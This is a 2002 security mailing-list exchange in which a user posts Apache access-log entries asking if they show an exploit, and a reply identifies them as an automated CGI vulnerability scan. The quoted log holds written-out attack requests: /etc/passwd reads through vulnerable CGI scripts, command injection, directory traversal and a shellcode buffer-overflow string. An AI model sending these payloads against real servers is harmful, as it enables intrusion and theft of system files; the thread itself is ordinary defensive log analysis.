This is a webscan, or a cgi scan, or We can tell, a Script Kiddies Attempt. Sorry me poor English, Best Regards , "Quem nunca pirateou que atire o 1º disco, que eu atiro uma cópia" =================== Sp0oKeR - NsC Analista Linux / Security spooker@bol.com.br ==================== ----- Original Message ----- From: Charles Funderburk <charles.t.funderburk@mail.sprint.com> To: <suse-security@suse.com> Sent: Wednesday, July 10, 2002 3:04 PM Subject: [suse-security] Possible Apache Exploit? Quer ter seu próprio endereço na Internet? Garanta já o seu e ainda ganhe cinco e-mails personalizados. DomíniosBOL - http://dominios.bol.com.br Hello all, I am new to the list and have gained a ton from reading all the comments and suggestions. I thought someone might be able to help me out and give me their two cents on something I noticed in my Apache access logs.Looks like a buffer overflow intended for a NT machine. 0.70.24.222 - - [10/Jul/2002:01:05:44 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /IAmAScaryCyberCop.SNI" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/openfile.cfm HTTP/1.0" 404 302 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- +-+-+ -+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t `}`%03%CA%FF%D1%BAX_|_%B9XP|`%03%CA%FF%D1c:\command.com_ /c_copy_\WebSite\readme.1st_\WebSite\htdocs\cybercop.htm" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/displayopenedfile.cfm HTTP/1.0" 404 311 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cybercop.htm" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET http://10.144.192.54/cfdocs/expeval/exprcalc.cfm HTTP/1.0" 404 302 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET file://etc/passwd" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.0" 404 292 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/info2www?(../../../../../../../../sbin/ping-c%d%s|)" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/pfdispaly?../../../../../etc/passwd" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "get /" 501 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/MachineInfo" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /IAmAScaryCyberCop.SNI" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&d sn=NA I+Test&dbq=..%2fwwwroot%2fNAI-18719.htm&newdb=CREATE_DB&attr= HTTP/1.0" 404 299 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /ASPSamp/ HTTP/1.0" 404 283 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/Count.cgi?dd=aa HTTP/1.0" 404 292 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /mylog.phtml?screen=/etc/passwd" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET / HTTP/1.0" 200 1350 10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "GET /mlog.phtml?screen=/etc/passwd" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "GET /php/mylog.phtml?screen=/etc/passwd" 404 - 10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "POST /cgi-win/uploader.exe/cgi-win/ HTTP/1.0" 404 304 I haven't seen any of the code for the latest apache chunk exploit. Anyone have any ideas or suggestions? Thanks! -Charles -- To unsubscribe, e-mail: suse-security-unsubscribe@suse.com For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here